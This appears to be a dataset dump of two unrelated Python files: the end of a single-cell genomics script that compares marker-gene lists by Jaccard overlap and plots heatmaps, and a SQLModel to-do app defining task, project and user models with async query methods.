    merged = reduce(lambda left, right: pd.concat([left, right], axis=1),
                    [frames[key] for key in frames])
    # SF markers capped to the gene set of the corresponding CU column.
    for col in [c for c in merged.columns if 'SF' in c]:
        cu_mask = ~pd.isnull(merged.loc[:, col.replace('SF', 'CU')])
        merged.loc[:, col.replace('SF', 'SC')] = merged.loc[cu_mask, col]
    print(merged)
    merged.to_csv('marker_name_list.csv')
    compare_rank_across_datasets(merged)
def plot_marker():
    """Render the original marker-gene plot for every gene-level scanpy object."""
    global GSES, SCANPY_OBJS
    for dataset, obj_name in zip(GSES, SCANPY_OBJS['gene']):
        print(obj_name)
        print(dataset)
        pdf_name = dataset + "_original_marker_gene.pdf"
        plot_specific_markers(os.path.join('output/scobj/', obj_name), pdf_name)
def compute_marker_overlap():
    """Compute marker-list overlaps for the icluster rank lists (unannotated)."""
    # The annotated cell-type variant is currently disabled:
    # compute_marker_overlap_gene_list(['rank_gene_list_celltype.csv'], ['marker_name_list.csv'], 'gene_celltype', True)
    compute_marker_overlap_gene_list(
        ['rank_gene_list_icluster.csv'], ['marker_name_list.csv'],
        'gene_icluster', False)
def heatmap(data, row_labels, col_labels, ax=None,
            cbar_kw=None, cbarlabel="", **kwargs):
    """
    Create a heatmap from a numpy array and two lists of labels.
    Parameters
    ----------
    data
        A 2D numpy array of shape (N, M).
    row_labels
        A list or array of length N with the labels for the rows.
    col_labels
        A list or array of length M with the labels for the columns.
    ax
        A `matplotlib.axes.Axes` instance to which the heatmap is plotted. If
        not provided, use current axes or create a new one. Optional.
    cbar_kw
        A dictionary with arguments to `matplotlib.Figure.colorbar`.
        Defaults to an empty dict. Optional.
    cbarlabel
        The label for the colorbar. Optional.
    **kwargs
        All other arguments are forwarded to `imshow`.
    """
    # Avoid a mutable default argument: a shared `{}` default would leak
    # state across calls if it were ever mutated.
    if cbar_kw is None:
        cbar_kw = {}
    if not ax:
        ax = plt.gca()
    # Plot the heatmap
    im = ax.imshow(data, **kwargs)
    # Create colorbar
    cbar = ax.figure.colorbar(im, ax=ax, **cbar_kw)
    cbar.ax.set_ylabel(cbarlabel, rotation=-90, va="bottom")
    # We want to show all ticks...
    ax.set_xticks(np.arange(data.shape[1]))
    ax.set_yticks(np.arange(data.shape[0]))
    # ... and label them with the respective list entries.
    ax.set_xticklabels(col_labels)
    ax.set_yticklabels(row_labels)
    # Let the horizontal axes labeling appear on top.
    ax.tick_params(top=True, bottom=False,
                   labeltop=True, labelbottom=False)
    # Rotate the tick labels and set their alignment.
    plt.setp(ax.get_xticklabels(), rotation=-30, ha="right",
             rotation_mode="anchor")
    # Turn spines off and create white grid (only the spine objects are
    # needed, so iterate the values rather than the items).
    for spine in ax.spines.values():
        spine.set_visible(False)
    ax.set_xticks(np.arange(data.shape[1]+1)-.5, minor=True)
    ax.set_yticks(np.arange(data.shape[0]+1)-.5, minor=True)
    ax.grid(which="minor", color="w", linestyle='-', linewidth=3)
    ax.tick_params(which="minor", bottom=False, left=False)
    return im, cbar
def annotate_heatmap(im, data=None, valfmt="{x:.2f}",
                     textcolors=("black", "white"),
                     threshold=None, **textkw):
    """
    A function to annotate a heatmap.
    Parameters
    ----------
    im
        The AxesImage to be labeled.
    data
        Data used to annotate. If None, the image's data is used. Optional.
    valfmt
        The format of the annotations inside the heatmap. This should either
        use the string format method, e.g. "$ {x:.2f}", or be a
        `matplotlib.ticker.Formatter`. Optional.
    textcolors
        A pair of two color specifications. The first is used for
        values below a threshold, the second for those above. Optional.
    threshold
        Value in data units according to which the colors from textcolors are
        applied. If None (the default) uses the middle of the colormap as
        separation. Optional.
    **textkw
        All other arguments are forwarded to each call to `text` used to
        create the text labels.
    """
    if not isinstance(data, (list, np.ndarray)):
        data = im.get_array()
    # Normalize the threshold to the images color range.
    if threshold is not None:
        threshold = im.norm(threshold)
    else:
        threshold = im.norm(data.max())/2.
    # Set default alignment to center, but allow it to be
    # overwritten by textkw.
    kw = dict(horizontalalignment="center",
              verticalalignment="center")
    kw.update(textkw)
    # Get the formatter in case a string is supplied
    if isinstance(valfmt, str):
        valfmt = matplotlib.ticker.StrMethodFormatter(valfmt)
    # Loop over the data and create a `Text` for each "pixel".
    # Change the text's color depending on the data.
    texts = []
    for i in range(data.shape[0]):
        for j in range(data.shape[1]):
            # Index 0/1 picks the below-/above-threshold color.
            kw.update(color=textcolors[int(im.norm(data[i, j]) > threshold)])
            text = im.axes.text(j, i, valfmt(data[i, j], None), **kw)
            texts.append(text)
    return texts
def plot_sim_map(dist, inter, header, row_labels, col_labels):
    """Draw a Jaccard-similarity heatmap annotated with intersection counts.

    Saves the figure as <header>_similarity.pdf and writes the similarity
    and intersection matrices to <header>_jaccard.csv / <header>_inter.csv.

    dist       -- 2D array of Jaccard similarities
    inter      -- 2D integer array of intersection sizes (same shape)
    header     -- prefix for the output file names
    row_labels, col_labels -- axis labels for the matrices
    """
    fig, ax = plt.subplots()
    print(dist)
    print(inter)
    im, cbar = heatmap(dist, row_labels, col_labels, ax=ax,
                       cmap="magma_r", cbarlabel="Jaccard")
    texts = annotate_heatmap(im, data=inter, valfmt="{x:d}")
    fig.tight_layout()
    # Fixed ordering: save BEFORE show().  In non-interactive backends
    # show() tears the figure down, so saving afterwards wrote a blank PDF.
    plt.savefig(header+'_similarity.pdf')
    plt.show()
    plt.close('all')
    plt.clf()
    pd.DataFrame(dist, index=row_labels, columns=col_labels).to_csv(header+'_jaccard.csv')
    pd.DataFrame(inter, index=row_labels, columns=col_labels).to_csv(header+'_inter.csv')
def compute_marker_overlap_gene_list(rank_file_list, marker_file_list, header, annotated=True):
    """Pairwise-compare marker sets and ranked gene lists by Jaccard overlap.

    For every pair of marker sources (curated marker columns plus the
    computed rank-list columns, top-100 genes each) a Jaccard matrix is
    drawn as a seaborn clustermap and passed to plot_sim_map together with
    the raw intersection counts; finally one combined clustermap over all
    columns is saved as marker_overlaps_<header>_all_clustered.pdf.

    rank_file_list   -- CSVs of ranked gene lists (columns = samples/clusters)
    marker_file_list -- CSVs of curated marker names (columns = marker sets)
    header           -- tag for output names; 'cluster' in it enables
                        dendrogram reordering and a smaller font
    annotated        -- True when columns are already cell-type annotated;
                        otherwise a cluster assignment table is loaded
    """
    global AMARKER, SET
    if 'cluster' in header:
        matplotlib.rcParams.update({'font.size': 5})
    viridis = cm.get_cmap('viridis', 15)
    # Marker source order: curated sets, then 'SM', then the remaining sets.
    all_markers = AMARKER[0:SET]+['SM']+AMARKER[(SET):len(AMARKER)]
    def get_data(i, m):
        # Return (top-100 rows of the columns matching source `m`, colors).
        # Sources with index < SET+1 come from the curated `marker` table;
        # later ones come from the rank-list `data` table (closure variables
        # assigned below, before the loops that call this).
        print(i, m, SET)
        if i < SET+1:
            temp = marker.loc[:,marker.columns.str.contains(pat=m)]
            colors = set_marker_color([x.split('_')[1] for x in temp.columns], 'Set2', ['NN', 'EX', 'IN'], others='NN')
        else:
            temp = data.loc[:,data.columns.str.contains(pat=m)]
            sample_types = convert_sample_to_label(temp.columns, dict)
            if '3_NA' in sample_types:
                colors = set_marker_color(sample_types, 'Set2', ['3_NA', '0_NN', '1_EX', '2_IN'])
            else:
                colors = set_marker_color(sample_types, 'Set2', ['0_NN', '1_EX', '2_IN'])
        print(temp.head())
        # Stable column order so pairwise comparisons are reproducible.
        temp = temp.reindex(sorted(temp.columns), axis=1)
        return temp.iloc[0:100, :], colors
    # Concatenate all rank-list CSVs column-wise into `data`.
    data = None
    for fname in rank_file_list:
        df = pd.read_csv(fname, index_col=0)
        if data is None: data = df
        else: data = pd.concat([data, df], axis=1)
    # Concatenate all curated marker CSVs column-wise into `marker`.
    marker = None
    for fname in marker_file_list:
        df = pd.read_csv(fname, index_col=0)
        if marker is None: marker = df
        else: marker = pd.concat([marker, df], axis=1)
    # NOTE(review): `dict` shadows the builtin here and is read by the
    # get_data closure; kept as-is to avoid touching behavior.
    if annotated:
        dict = None
    else:
        dict = read_cluster_assignment(icluster=('icluster' in header))
    flag_dendro = ('cluster' in header)
    # Upper-triangle pairwise comparison of all marker sources.
    for i, m1 in enumerate(all_markers):
        # break
        left, row_colors = get_data(i, m1)
        if left.shape[0] == 0:
            continue
        for j, m2 in enumerate(all_markers):
            if j <= i: continue
            print(m1, m2)
            right, col_colors = get_data(j, m2)
            if right.shape[0] == 0:
                continue
            # The inner `j` is comprehension-local (Python 3) and does not
            # clobber the outer loop index.
            dist = [[compute_jaccard(left.loc[~pd.isnull(left.loc[:,c]),c], right.loc[~pd.isnull(right.loc[:,j]),j]) for j in right.columns] for c in left.columns]
            dist = pd.DataFrame(dist, columns=right.columns)
            dist.index = left.columns
            print(dist)
            g = sns.clustermap(dist, cmap=viridis, row_colors=row_colors, col_colors=col_colors, linewidths=0.0, col_cluster=flag_dendro, row_cluster=flag_dendro)
            g.savefig("marker_overlaps_"+header+'_'+m1+'_'+m2+"_clustered.pdf")
            if flag_dendro:
                # Reorder the matrix to match the dendrogram leaf order.
                col_ind, row_ind = g.dendrogram_col.reordered_ind, g.dendrogram_row.reordered_ind
                dist = dist.iloc[:, col_ind]
                dist = dist.iloc[row_ind,:]
            inter = [[compute_intersect(left.loc[~pd.isnull(left.loc[:,c]),c], right.loc[~pd.isnull(right.loc[:,j]),j]) for j in dist.columns] for c in dist.index]
            plot_sim_map(dist.values, np.array(inter), header+'_'+m1+'_'+m2, dist.index, dist.columns)
    # Combined map: drop NA columns, keep the top-100 genes per column.
    data = data.loc[:, [x for x in sorted(data.columns) if 'NA' not in x]].iloc[0:100, :]
    if flag_dendro:
        sample_types = convert_sample_to_label(data.columns, dict)
        print(sample_types)
        print(data)
        print(data.shape)
        print(len(sample_types))
        data = data.iloc[:, [i for i, s in enumerate(sample_types) if 'NA' not in s]]
        sample_types = [s for s in sample_types if 'NA' not in s]
        colors = set_marker_color(sample_types, 'Set2', ['0_NN', '1_EX', '2_IN'])
    else:
        colors = set_marker_color([x.split('_')[1] if len(x.split('_')) <= 3 else x.split('_')[-1] for x in data.columns], 'Set2', ['NN', 'EX', 'IN'], others='NN')
        data = data.iloc[:, [i for i, c in enumerate(colors) if 'NA' not in c]]
        colors = [c for c in colors]
    colors = colors + set_marker_color([x.split('_')[1] for x in marker.columns], 'Set2', ['NN', 'EX', 'IN'], others='NN')
    data = pd.concat([data, marker], axis=1)
    dist = [[compute_jaccard(data.loc[~pd.isnull(data.loc[:,c]), c], data.loc[~pd.isnull(data.loc[:,j]), j]) for j in data.columns] for c in data.columns]
    dist = pd.DataFrame(dist, columns=data.columns)
    dist.index = data.columns
    g = sns.clustermap(dist, cmap=viridis, row_colors=colors, col_colors=colors, linewidths=0.0, col_cluster=True, row_cluster=True)
    g.savefig("marker_overlaps_"+header+'_all_clustered.pdf')
# def plot_venn_diagram():
# df = pd.read_csv("marker_name_list.csv")
# gdf = pd.read_csv("rank_gene_list_celltype.csv").iloc[0:100,:]
# for marker_type in ['major', 'minor']:
# if marker_type == 'major':
# df.loc[:,~df.columns.str.startswith('SM')]
# labels = venn.get_labels([range(10), range(5, 15), range(3, 8), range(8, 17), range(10, 20), range(13, 25)], fill=['number', 'logic'])
# fig, ax = venn.venn6(labels, names=['list 1', 'list 2', 'list 3', 'list 4', 'list 5', 'list 6'])
# fig.show()
if __name__ == "__main__":
    # Marker directories and their per-cell-type marker files.  Entries are
    # ordered to match the SF/CU/TA/TN/SM sources used by the rank helpers.
    mdirs = ['/data/rkawaguc/data/190814_BICCN_sf_marker', '/data/rkawaguc/data/190814_BICCN_sf_marker', '/data/rkawaguc/data/190425_BICCN_RNA/gene_annotation_from_scRNA', '/data/rkawaguc/data/190425_BICCN_RNA/gene_annotation_from_scRNA', '/data/rkawaguc/data/191003_BICCN_sf_marker_more']
    mfiles = [['GABAergic_markers_fc.txt', 'Glutamatergic_markers_fc.txt', 'Non.Neuronal_markers_fc.txt'], ['cusanovich2018_inh.txt', 'cusanovich2018_ext.txt', 'cusanovich2018_gli.txt'], ['tasic2016_gaba.txt', 'tasic2016_glu.txt', 'tasic2016_gli.txt'], ['tasic2018_gaba.txt', 'tasic2018_glu.txt', 'tasic2018_gli.txt'], ['excitatory_L2.3.IT.txt', 'excitatory_L5.6.NP.txt', 'excitatory_L5.ET.txt', 'excitatory_L5.IT.txt', 'excitatory_L6.CT.txt', 'excitatory_L6.IT.Car3.txt', 'excitatory_L6b.txt', 'gabaergic_Lamp5.txt', 'gabaergic_Pvalb.txt', 'gabaergic_Sncg.txt', 'gabaergic_Sst.txt', 'gabaergic_Vip.txt']]
    # The [5:] slice limits the default run to 'exp_evaluation' and
    # 'prom_dist'; other steps must be requested explicitly on the CLI.
    methods = ['plot_marker', 'make_rank_list', 'plot_rank', 'rank_evaluation', 'summarize_evaluation', 'exp_evaluation', 'prom_dist'][5:]
    # A single CLI argument selects one step (including steps not in
    # `methods`, e.g. 'marker_similarity' or 'plot_cluster_mean').
    if len(sys.argv) > 1:
        method = [sys.argv[1]]
    else:
        method = methods
    for m in method:
        if m == 'plot_marker':
            plot_marker()
        elif m == 'make_rank_list':
            integrate_rank_data(mdirs, mfiles)
        elif m == 'plot_rank': # after make rank list
            plot_heatmap_rank()
        elif m == 'rank_evaluation':
            rank_evaluation()
        elif m == 'summarize_evaluation':
            summarize_auc_result()
        elif m == 'exp_evaluation':
            plot_auc_from_exp()
        elif m == 'prom_dist':
            compare_prom_and_dist()
        elif m == 'marker_similarity':
            compute_marker_overlap()
        elif m == 'plot_cluster_mean':
            files = ["BICCN2_gene_id_order_gene__all_", "GSE111586_gene_id_order_gene__all_bin_", "GSE123576_gene_id_order_gene__all_", "GSE126074_gene_id_order_gene__all_", "GSE127257_distal_id_gene_order__all_", "GSE1303990_gene_id_order_gene__all_"]
            for cluster in ['celltype', 'cluster', 'icluster']:
                # NOTE(review): this extend mutates `files` during the
                # 'cluster' iteration, so GSE100033 is also included in the
                # subsequent 'icluster' pass — presumably intentional; verify.
                if cluster == 'cluster':
                    files.extend(["GSE100033_gene_id_order_gene__all_"])
                plot_aggregated_cluster_mean(mdirs, mfiles, files, cluster)
|
from __future__ import annotations
from datetime import datetime
from typing import Iterator
from sqlalchemy.ext.asyncio import AsyncSession
from sqlmodel import SQLModel, Field, Relationship, select
from todo_app.status import Status
class Task(SQLModel, table=True):
    # A single to-do item linked to its author (a User) and a Project.
    id: int = Field(primary_key=True)
    name: str
    description: str
    author_id: int = Field(foreign_key="user.id")
    project_id: int = Field(foreign_key="project.id")
    # Stored as a plain string; defaults to the NOT_COMPLETED status value.
    status: str = Status.NOT_COMPLETED
    created: datetime = Field(default_factory=datetime.utcnow)
    # NOTE(review): 'completed' defaults to the creation time even while the
    # task is still NOT_COMPLETED — presumably overwritten when the task is
    # finished; confirm, or consider making it nullable.
    completed: datetime = Field(default_factory=datetime.utcnow)
    # Many-to-one links; forward references resolve lazily thanks to the
    # file's `from __future__ import annotations`.
    author: User = Relationship()
    project: Project = Relationship()
class Project(SQLModel, table=True):
    """A collection of tasks owned by a single user."""

    id: int = Field(primary_key=True)
    name: str
    description: str
    owner_id: int = Field(foreign_key="user.id")
    archived: bool = False
    inbox: bool = False  # True for the owner's default "inbox" project
    owner: User = Relationship()

    async def get_tasks(self, session: AsyncSession) -> list[Task]:
        """Return every task that belongs to this project."""
        query = select(Task).where(Task.project_id == self.id)
        result = await session.execute(query)
        return result.scalars().all()

    async def get_completed_tasks(self, session: AsyncSession) -> list[Task]:
        """Return this project's tasks whose status is COMPLETED."""
        query = select(Task).where(
            Task.project_id == self.id, Task.status == Status.COMPLETED
        )
        # Fixed: sqlalchemy's AsyncSession has no .exec() (that is the
        # sqlmodel wrapper); use execute()+scalars() as in get_tasks().
        result = await session.execute(query)
        return result.scalars().all()

    async def get_unfinished_tasks(self, session: AsyncSession) -> list[Task]:
        """Return this project's tasks whose status is NOT_COMPLETED."""
        query = select(Task).where(
            Task.project_id == self.id, Task.status == Status.NOT_COMPLETED
        )
        result = await session.execute(query)
        return result.scalars().all()
class User(SQLModel, table=True):
    """An account that owns projects (and, through them, tasks)."""

    id: int = Field(primary_key=True)
    name: str
    # NOTE(review): datetime.utcnow stores naive timestamps and is deprecated
    # in recent Pythons; switching to timezone-aware values would change what
    # is persisted, so it is left untouched here.
    joined: datetime = Field(default_factory=datetime.utcnow)
    last_login: datetime = Field(default_factory=datetime.utcnow)
    # Fixed: one user owns many projects, so the relationship must be
    # annotated as a list for SQLModel to configure it as one-to-many.
    projects: list[Project] = Relationship()

    async def get_inbox(self, session: AsyncSession) -> Project:
        """Return the user's inbox project, falling back to any project.

        Raises ValueError when the user owns no projects at all.
        """
        query = select(Project).where(Project.inbox, Project.owner_id == self.id)
        if project := (await session.execute(query)).scalars().first():
            return project
        if projects := await self.get_projects(session):
            return projects[0]
        raise ValueError(
            f"{self!r} doesn't have any projects. Could not find an inbox."
        )

    async def get_active_projects(self, session: AsyncSession) -> list[Project]:
        """Return the user's non-archived projects."""
        # '== False' is intentional: it builds a SQL boolean expression
        # ('not' would not).  Fixed: AsyncSession has no .exec(); the
        # original also called .scalars() on the nonexistent exec result.
        query = select(Project).where(
            Project.owner_id == self.id, Project.archived == False
        )
        result = await session.execute(query)
        return result.scalars().all()

    async def get_archived_projects(self, session: AsyncSession) -> list[Project]:
        """Return the user's archived projects."""
        query = select(Project).where(
            Project.owner_id == self.id, Project.archived == True
        )
        result = await session.execute(query)
        return result.scalars().all()

    async def get_projects(self, session: AsyncSession) -> list[Project]:
        """Return all projects owned by the user."""
        query = select(Project).where(Project.owner_id == self.id)
        result = await session.execute(query)
        return result.scalars().all()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.